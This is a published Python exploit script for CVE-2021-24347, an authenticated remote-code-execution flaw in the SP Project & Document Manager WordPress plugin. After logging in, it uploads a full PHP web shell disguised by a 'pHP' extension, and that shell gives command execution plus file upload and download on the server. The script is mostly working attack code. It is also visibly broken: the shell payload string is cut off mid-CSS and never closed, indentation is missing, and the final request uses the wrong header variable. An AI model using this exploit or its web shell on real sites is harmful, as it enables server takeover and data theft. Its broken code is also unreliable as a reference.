WordPress SP Project And Document Manager 4.21 Shell Upload

`# Exploit Title: Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)  
# Date 07.07.2021  
# Exploit Author: Ron Jost (Hacker5preme)  
# Vendor Homepage: https://smartypantsplugins.com/  
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip  
# Version: Before 4.22  
# Tested on: Ubuntu 18.04  
# CVE: CVE-2021-24347  
# CWE: CWE-434  
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24347/README.md  
  
'''  
Description:  
The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however,  
the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded  
by checking the file extension. It was discovered that php files could still be uploaded by  
changing the file extension's case, for example, from "php" to "pHP".  
'''  
  
  
'''  
Banner:  
'''  
banner = """  
______ _______ ____ ___ ____ _ ____ _ _ _____ _ _ _____   
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || ||___ /| || |___ |  
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_ |_ \| || |_ / /   
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _|__) |__ _/ /   
\____| \_/ |_____| |_____|\___/_____|_| |_____| |_||____/ |_|/_/   
  
* Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)   
* @Hacker5preme  
  
"""  
print(banner)  
  
  
'''  
Import required modules:  
'''  
import requests  
import argparse  
  
  
'''  
User-Input:  
'''  
my_parser = argparse.ArgumentParser(description='Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)')  
my_parser.add_argument('-T', '--IP', type=str)  
my_parser.add_argument('-P', '--PORT', type=str)  
my_parser.add_argument('-U', '--PATH', type=str)  
my_parser.add_argument('-u', '--USERNAME', type=str)  
my_parser.add_argument('-p', '--PASSWORD', type=str)  
args = my_parser.parse_args()  
target_ip = args.IP  
target_port = args.PORT  
wp_path = args.PATH  
username = args.USERNAME  
password = args.PASSWORD  
print('')  
print('[*] Starting Exploit:')  
print('')  
  
'''  
Authentication:  
'''  
session = requests.Session()  
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'  
  
# Header:  
header = {  
'Host': target_ip,  
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Origin': 'http://' + target_ip,  
'Connection': 'close',  
'Upgrade-Insecure-Requests': '1'  
}  
  
# Body:  
body = {  
'log': username,  
'pwd': password,  
'wp-submit': 'Log In',  
'testcookie': '1'  
}  
  
# Authenticate:  
print('')  
auth = session.post(auth_url, headers=header, data=body)  
auth_header = auth.headers['Set-Cookie']  
if 'wordpress_logged_in' in auth_header:  
print('[+] Authentication successfull !')  
else:  
print('[-] Authentication failed !')  
exit()  
  
  
'''  
Retrieve User ID from the widget:  
'''  
user_id_text = session.get('http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview').text  
search_string = "<form><select name='user_uid' id='user_uid' class=''>"  
user_string = ">" + username  
user_id_text = user_id_text[user_id_text.find(search_string):]  
user_id_text = user_id_text[user_id_text.find(user_string) - 2: user_id_text.find(user_string)]  
user_id = user_id_text.replace("'", '')  
  
  
'''  
Exploit:  
'''  
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview&id=' + user_id  
  
# Header (Exploit):  
Header = {  
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",  
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",  
"Accept-Encoding": "gzip, deflate",  
"Referer": exploit_url,  
"Content-Type": "multipart/form-data; boundary=---------------------------37032792112149247252673711332",  
"Origin": "http://" + target_ip,  
"Connection": "close",  
"Upgrade-Insecure-Requests": "1"  
}  
  
# Web Shell payload (p0wny shell): https://github.com/flozz/p0wny-shell  
shell_payload = "-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\r\n\r\na1b3bac1bc\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-name\"\r\n\r\nExploits\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"shell.pHP\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-we  
  
# Exploit:  
session.post(exploit_url, headers=header, data=shell_payload)  
print('')  
print('[+] Exploit done !')  
print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/sp-client-document-manager/' + user_id + '/shell.php')  
print('')  
  
`